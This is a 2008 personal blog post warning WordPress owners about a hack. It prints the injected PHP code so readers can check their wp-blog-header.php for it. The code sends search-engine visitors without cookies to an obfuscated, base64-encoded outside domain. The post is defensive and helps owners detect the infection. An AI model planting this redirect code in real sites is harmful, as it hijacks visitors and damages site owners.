Hello. I specialize in graphic design for web and print projects.

TylerM – Tyler Menezes \ Blog \ Wordpress Vulnerability

Wordpress Vulnerability

June 7, 2008 at 5:22 pm

There’s a big Wordpress vulnerability going around (see http://clasione.blogspot.com/2008/06/wordpress-anyresultsnet-hack-search.html for details). Be sure to check your wp-blog-header.php for:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

Is your site infected?

Use this tool to check:

Say your words!

XHTML: You can use the tags <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> in your reply.

Comment Policy: Be nice. If you disagree, feel free to do so, but in a fact-supported manner. (E.g. "You are wrong. For example, the Wikipedia page for this subject says..." is okay, "You are a noob because you disagree with me!" is not.) Swearing is okay, provided it's not just there for the point of swearing and it's not excessive. Trolls aren't okay. This is not YouTube. By commenting you give me a perpetual, non-revokable license to publish your comments on my site. I can modify and delete them at will from this point.

* Your email will never be displayed, and I won't share it with anyone. If you have a Gravitar it will automatically be used.

Copyright © 2007 - 2008 Tyler Menezes.

All rights reserved. Y hallo thar, u is da admin?